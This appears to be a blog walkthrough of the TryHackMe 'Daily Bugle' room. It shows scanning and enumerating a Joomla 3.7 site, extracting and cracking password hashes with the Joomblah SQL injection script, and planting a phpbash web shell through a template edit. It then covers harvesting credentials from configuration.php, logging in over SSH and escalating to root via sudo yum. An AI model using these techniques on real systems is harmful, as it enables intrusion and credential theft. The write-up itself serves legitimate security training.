TryHackMe Walkthrough "Daily Bugle - Joomla Exploitation

Daily Bugle from TryHackMe (https://tryhackme.com/room/dailybugle) is another one of the many free offerings from TryHackMe.  Today's walkthrough will show you how to enumerate Joomla, exploiting a vulnerability with a tool called Joomblah, introduce you to a php script called phpbash, and more.  So let's get to it!

Scanning

We get started like we always do, but investigating our target with Nmap.

 nmap 10.10.99.88

nmap -A -p22,80,3306 10.10.99.88

We have a few ports open here, with SSH, a web server, and a port running MariaDB. We can tell from the output that the web server is running Apache and PHP,, however the http-generator banner is Joomla, which is a well known Content Management System (CMS).  Now that we see what we are working with, let's enumerate!

Enumeration

Our first stop is the web server, which reveals a pretty basic website.

10.10.99.88 Daily Bugle Web Server

Additionally, let's check our Wappalyzer output.

Wappalyzer Output

We are able to gather much of the information we saw from the Nmap scan, however still know little about the Joomla service.  Fortunately there is a tool in the Apt repository called "Joomscan" that we can utilize to gather this information.  

joomscan -u 10.10.99.88

Joomscan shows us that the Joomla version is 3.7, as well as some subdirectories that we can investigate.  Let's research the Joomla version to see if we can find any vulnerabilities.

searchsploit joomla 3.7

Searchsploit gives us a bunch of indications that this version of Joomla is vulnerable to SQL injection, however most of the results include SQLmap queries to do this.  We are going full try harder mode with this one, and luckily someone has done the leg work to develop a tool for us.  Searching for Joomla 3.7 exploits found the following.

Joomblah.py on Github

Joomblah is a Python script that will exploit the vulnerability that we have found, and provide us with any underlying usernames and passwords that may be available.  So let's move to the Exploitation section next and get to work.

Exploitation

Now that we have discovered a tool that might help us, and we have researched what it does and how to use it, let's try it out.

python joomblah.py http://10.10.99.88

The syntax is easy enough, however you will get errors if you omit the http:// in the url.  Running this exploit allows us to extract usernames and passwords from the service, which we can then utilize to log into the Joomla administrator panel (we discovered that subdirectory with Joomscan).  However, we are provided with a hash rather than a password, and will need to crack that first.  

echo 'password hash' > to crack; john tocrack --wordlist=/root/Desktop/passes/rockyou.txt

10.10.99.88/administrator

Joomla dashboard after login

We have superuser authority on the system, which should allow us pretty free reign on what we need to do.  Conducting some research on how to pivot further, we discover that we can modify a theme and inject a php payload that will allow us shell access to the underlying machine.  We can do this by doing the following:

If you have followed the pictures above, you'll land on a modifiable input that contains the index.php code.  We are going to replace this with our own malicious code.  In this case I wanted to experiment with a php script I recently discovered called "phpbash (https://github.com/Arrexel/phpbash)," which essentially opens a bash script terminal in the browser window.  Grab that code from the Github above, and replace the php code with it.  Once you've pasted in your code, press save, and then the "Template Preview" button shown in the image below.

Replacing current PHP code with our phpbash code, saving and clicking Template Preview

Hopefully you have done this correctly.  If you have, you should get a result that looks like the following.

phpbash; whoami & ls commands ran

Now that we have access to the machine, we can run some commands to test functionality.  It's a semi-interactive terminal, so it does lack some function, but we can get by for now.  Of interest is the configuration.php file, which can oftentimes contain login information for underlying services.  In this case, we've hit the jackpot.

cat configuration.php

There are some credentials here that we may be able to leverage.  We know that SSH is running on the machine, but we still need a username.  Checking the /home directory can help quick.

cd /home; ls

We have a user and a possible password.  Let's see if it'll work.

ssh jjameson@10.10.99.88

And we are successfully logged in.  Additionally a sudo -l shows us that we can run /usr/bin/yum as sudo.  Quickly researching that on GTFObins shows us that a Yum can be used to escalate privileges to root.

Yum results on GTFObin

We are going to simply copy the entire contents of the (b) section, and paste them in the terminal and run it.  Doing so will elevate us to root!

Yum privilege escalation to root

You can grab your user and root flags from here, submit those in the THM dashboard, and complete the room.  Congratulations!

Final Thoughts

Those who know me know that I'm not the biggest fan of web app pentesting and challenges like this.  Daily Bugle wasn't the typical challenge I would loathe, however, and despite being rated insane in THM, I found it pretty straight forward.  I hope you've all learned something today and enjoyed this walkthrough.  I'll see you again soon!